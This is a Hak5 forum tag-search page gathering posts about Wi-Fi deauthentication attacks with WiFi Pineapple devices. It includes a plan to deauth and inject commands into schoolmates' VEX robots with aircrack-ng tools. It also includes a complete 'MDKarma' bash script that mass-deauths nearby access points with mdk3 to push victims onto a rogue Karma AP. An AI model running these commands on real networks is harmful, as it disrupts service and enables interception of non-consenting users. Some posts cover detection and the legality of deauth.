Jump to content

Search the Community

Showing results for tags 'Deauth'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 16 results

  1. Hello people, I was recently doing some work with those VEX Robotics wireless control robots and I had some ideas about packet sniffing attacks, replay attacks, man in the middle attacks, and de-authentication attacks. The robots use the Vex cortex, which has a wireless adapter through a USB port, it says that is is 2.4 GHz, and another USB wireless adapter is plunged into a controller, like a joystick. My school did a competition with these robots, and it ended last week, now we are doing another thing just as a school, they said we were doing battle bots. When I did some research I hadn't seen anybody do anything like this and I though I would look into it. When I was doing research I found that, the robots don't use any encryption it is end to end, the controllers or create there own network an access point that the robot connects to, the network it creates is hidden it does not broadcast its SSID and has to be pared with the cortex, they are 2.4 GHz, they all have independent channels or mac addresses (many can operate at the same time without interference). The first thing I though of would be a deauth attack, where I would send out deauth frames to disconnect their robot from the controller from the cortex leaving their robot powerless, I was tinging I could do this with Aircrack-ng, put my wireless card into monitor mode with airmon-ng, find the mac address and channel of the robot with airodump-ng, deauth with aireplay-ng. The next attack I though of was if I could intercept packets from the remote to the cortex and either replay them to keep doing an operation or send in my own by finding out what commands correlated to what packets and injecting them while impersonating the robot. I have not done much with packet sniffing/replay/injection if anybody knows anything on how I could do that? or if anybody has done anything with these robots? or if you have any ideas on wireless attacks? I am all ears and I would love help and suggestions, this seems like a really cool project. I would love to hear your thoughts, thank you
  2. So I had some issues happen in the video but it just turns out I remembered things wrong although it still all works out in the end so I hope you all enjoy the video on this tool. Also I do a slight comparison of the node mcu vs aireplay.
  3. Hi there, I'm responsible for running entry systems for festivals - many gates using 50 scanners each working over wifi. I am concerned that somebody is going to think it's a jolly jape to set up a deauth attack on a gate which would stop our scanners working. When we have 50,000 people waiting to come in, it's very bad news. Can I deploy the tetra to watch for suspicious deauth packets if I suspect that's what happening? At least then I can inform the authorities that's what happening, not just our kit not working. I need the tetra because depending on the environment we are on 2.4 and 5Ghz Cheers
  4. Hi - new to WiFi Pineapple - I need to be able to specify the deauthentication reason code. Can this be done? thanks.
  5. Happy day today - just unboxed my Tetra and got it setup and ran through the "From Recon to PineAP" tutorial. Frowny-face - deauth fails every time. I've tried resetting to factory. I can discover clients, and put their MAC addresses in the filter, add an SSID to PineAP and configured the PineAP daemon per the instructions - and then run deauth in both the Recon page, and via the SiteSurvey module. When I setup the PineAP to "Capture SSIDs to Pool" it does so, and I can subsequently see those SSIDs as available APs in my test devices (Laptop x 2, Phone x 3, Desktop x 1). No matter what I do, I can't seem to deauth any of those devices, regardless of how close or far they are from the TETRA. Nothing is standing out in the debug log. Not sure if it's related, but recon stops if I navigate away from the page, regardless of how much time is left in the recon session... Any suggestions on how I should proceed?
  6. Hi All, I have just started setting up my WiFi Pineapple Nano that I recently purchased. I have upgraded the firmware to 1.1.1 and just started to test the capabilities on my home network. I followed the video WiFi Pineapple Primer - From Recon to PineAP by Darren and i get past all the steps (internet connection, filters etc) when I get to the Deauth option nothing seems to happen. I have tried multiple devices (iPhones, iPads, PC's, MacBooks) I have not managed to deauth one device. I have tried different setups from Kali, Android & Windows to see if I can get something to budge but no luck. I have also noticed when I send multiple requests eventually the PineAP turns off and I have to restart the process. I manually connected a device to the Open AP (I unhide this in the Network Settings) and it will appear on the Client list but I cannot seem to death and then get the SSID's in the Pool to connect the client to the Pineapple. Not sure if its the device or me (I'm pretty sure its something to do with device as I spent a fair few hours testing :). ) Please let me know if you anyone can help on anything I may have missed or I can try out. Thanks
  7. Hey Everyone, I am using Mark V and Firmware Version: 2.4.0 I am able to set up successfully, internet is shared, infusions are installed etc. Even I am able to use the recon module but when I try to use PineAP its getting failed, not sure the reason why? Even SSLStrip is not showing any logs etc.. It seems the SSLStrip is not working properly, however it shows that SSLStrip is started. Even DeAuth is not working. It seems none of the pentest tools working. Can anyone help me??
  8. I did a quick search of the forums but didn't find anything related to this. I came across this page on the FCC's site that states deauth attacks and jamming of WiFi are illegal in the US as of January, 2015. They also state the following: If you read the example they gave about a Marriott hotel deauthenticating users it appears the FCC doesn't know the different between that and jamming a signal. Of course they added that catch-all statement that any device that interferes with WiFi communications is illegal. Page 2 of that document states that no commercial establishment is allowed to block WiFi communication but the next paragraph down has the quote I posted above. It would appear that using the deauth feature of the Pineapple is now illegal, unless if I'm misinterpreting this.
  9. Can the MarkV be used to prevent a mobile device from operating as a WiFi hotspot. Is this something I can use the deauth infusion for?
  10. Hi , Is there any infusion available for Deauth or wifi jammer for Mark IV? or can any one suggest how to build one if not available
  11. Hi there.. I am wondering if i can run dnsspoof and deauth to make any clients that they are already connected to a network to disconnect and connect to my karma pineapple. I am using MacOS and Mark V. Thank you for your help!
  12. Hi i recently got myself an alfa121u and made it into a pineapple mark iv with firmware 2.8.1, as i saw some posts with problems in 3.0.0. everything seems to be working, but i cannot install the DeAuth infusion successfully. if i try to install it, i get an empty pineapple infusion with the size being the sum of all other infusions, and the remove link also deinstalls all other infusions. it is only listed in the infusionsList-File by "||usb||" or something similar. is there an installationlog which i can check? is the infusion broken? i tried searching the forum and google, but i always end up at the wifi jammer thread, which seems to have been merged, and has nothing on my problem. theoretically, can it be that the infusion has been broken by the update from 2.8.0 to 2.8.1? greets gon ------------- should have posted in the wifi jammer thread /close
  13. So I've had my Pineapple for a few days and started to learn the in's and outs of the MKV. I'm quite comfortable with using Karma and the other features, but would like to take it to the next step, by going out and doing deauth attacks.... In an early edition of HAK5 Darren Kitchen had an airport challenge where he was using Karma with a newish feature (at the time) called airdrop-ng, he showed an example of it, and looked easy to use. It dosnt seem to be on the MKV, however the aireplay-ng feature is. I've come across aireplay-ng but never used it. My question is, are these the same feature and how effective is the aireplay-ng command. Also is it possible to get the airdrop-ng command on the MKV. Thanks
  14. Hey guys! I present you, Automator!, A module that automates attacks such as Deauthing and Karma, and more on the way! It asks you for a few options on each attacks then commences the attack. Features : -Automated attacks -Install packages that are needed -Add and Edit profiles for attacks -Blackout Attacks - Disable all LEDs, enable stealth mode and select an attack! Coming soon : -Edit back-end scripts to suit your needs -Add community attacks/automations to the module -Auto-detect wifi cards -Reaver Automation Sneak peak :
  15. Hey guys! I am currently making a script that basically : -Asks for a MAC to avoid. -Asks how long to deauth for -Asks what interface to deauth on -Disables karma -Puts wlan0 into RFMON (Monitor Mode) -Starts MDK3 Deauthing for x amount of seconds inputted at the beginning -After x amount of seconds, Stops MDK3 -Removes mon0 -Starts karma again The point of this script is that it deauths all nearby access points then enables karma so that the people will reconnect to the pineapple, Allthough this can be done manually I thought a nice script would be nice that did it for you :) Run this script by copy/pasting into a file and call it mdkarma.sh, then do chmod +x mdkarma.sh, then do ./mdkarma , Incase it wasn't obvious, when I update the script, you have to the new code with the existing script you have... ***Module Development and further script development*** As suggested by some people, I have decided to take a go at developing a pineapple module that will automate 'attacks' such as the MDKarma script and other tricks I have planned from a UI, as well as flexibiltiy such as being able to edit the scripts to suit your needs without SSH'in into the pineapple to edit... I hope you all share your edits too and continue with feedback that helps add features :).... -------------------------------------------------------------------------------------------------------------------------------------- Edit : Version 1.2 - Fixed Channel Hopping, Added Whitelisting and added spacing for easier reading :) Edit : Version 1.2.3 - Added Whitelisiting. Please give some feedback and any improvements :) Code : #!/bin/bash #Part of the Pineapple Mojito Framework #Made by Foxtrot #Version 1.2.3 #Intro echo "!! This script is to be used only for legal, safe and authorised uses !!" echo "MDKarma V1.2.3" sleep 6 #Ask how long to deauth for echo -n "How long (In Seconds) to deauth for? : "; read deauthTime #Ask what Interface echo -n "What interface would you like to deauth on? : "; read deauthInterface #Ask if you want to whitelist read -r -p "Do you want to add a whitelist? [Y/n] " response if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]] then echo " " echo "Whitelist Created!" echo " " touch whitelist.txt read -r -p "MAC Address to add : " macaddr echo $macaddr >> whitelist.txt else echo " " echo "Avoiding Whitelist Creation!" echo " " fi #Put wlan0 up echo "Checking Interface wlan0 is up...." wifi sleep 3 #Stop Karma echo " " echo "Killing Karma...." hostapd_cli -p /var/run/hostapd-phy0 karma_disable > /dev/null sleep 3 #Put deauthInterface into monitor mode echo " " echo "Putting $deauthInterface into monitor mode...." airmon-ng start $deauthInterface > /dev/null sleep 3 #Start deauthing with MDK3 and stop echo " " echo "Deauthing Access Points with MDK3...." mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 & sleep $deauthTime && killall mdk3 sleep 3 #Kill airmon-ng and start Karma again. echo "Removing mon0 and enabling karma...." airmon-ng stop mon0 > /dev/null wifi hostapd_cli -p /var/run/hostapd-phy0 karma_enable > /dev/null sleep 3 #Finish echo " " echo "MDKarma Finished!" -Foxtrot
  16. Hey, first post here and I hope I am on the right thread. I am trying to send a single deauth frame. Normally I can send those with aireplay-ng but the -0 1 option actually sends a bach of 128 not 1. This might not be the best idea if the admin is running an IDS for example. I've been trying to find alternative tools for the job with not much luck. Does anyone know if there is a tool or a way with the aircrack-ng suite to do that? Thanks people.
×
×
  • Create New...